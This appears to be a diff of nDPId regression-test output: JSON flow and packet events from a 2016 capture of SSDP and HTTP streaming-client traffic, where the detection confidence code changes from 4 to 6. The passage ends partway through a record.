00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAAB0AABAAAERw5fAqAU\/7\/\/\/+pnXB2wAYBOHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnNzZHA6YWxsDQpNWDozDQoNCg=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAACXAABAAAERw3TAqAU\/7\/\/\/+u4wB2wAg73KTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVJlbmRlcmVyOjENCk1YOjMNCg0K"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"thread_ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\/dHlwZT1yZWNjdHBsYXkyMDEyMTIyNiZ1c3JhY3Q9c2hvdyZwcHVpZD0tMSZ1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mZXZlbnRfaWQ9NGIwODY4OTIwYjBmODI4NTMyMGE5ZTAwZWUwMzY5ZTUmY2lkPTMxJmJrdD1wcHNfY196ZWJyYV9tYWluX2RlZmF1bHQmYXJlYT1wcHNfY196ZWJyYSZwbGF0Zm9ybT0yMDEyJmFsYnVtbGlzdD00NzA2OTQ1MDAsNDcxNTkxMzAwLDQ2NTY0MTAwMCw0NzI4ODcxMDAsNDcxNzg4MTAwLDQ3Mzc0NjMwMCw0NzE5NDgzMDAsNDczNjk0NjAwLDQ3MjE4OTUwMCZhaWQ9NDc5NTMxMDAwJnNvdXJjZT0wLDEsMSwxLDEsMSwxLDEsMSZfPTE0NjczNTMxNjcwODcgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLnZpZGVvLnFpeWkuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1467353170523,"pkt":"TF4M6gNlABxCjnAxCABFAAQ7HjFAAIAGHsHAqHMIb84WTMVDAFDdQoxSQH15t1AYQTfZKwAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmcm49MTQ2NzM1MzE2NzIyMSZhPTM0JmNsdD10dmcyMDE1X2JhaWtlQl9jb21tZW50X3Nob3cmdHlwZT1wYyZyZWY9bm9yZWYmdXJsPWh0dHAlM0EvL3ZvZGd1aWRlLnBwcy5pcWl5aS5jb20vcGFnZS5waHAlM0Z2ZXJzaW9uJTNENS4yLjE1LjIyNDAlMjNjbGFzcyUzRDIwMDAwMzcxOSUyNTI0JTI1MjQlMjUyNCUyNTI0MTgwOTMyMzAxJTI2ZW50aXR5aWQlM0Q0Nzk1MzEwMDAlMjZiYWlrZWlkJTNEMjAzMjI5NDkwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} 01506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"thread_ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZXJpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\/kkVyVAYQTfM+gAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNzIwNTEmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 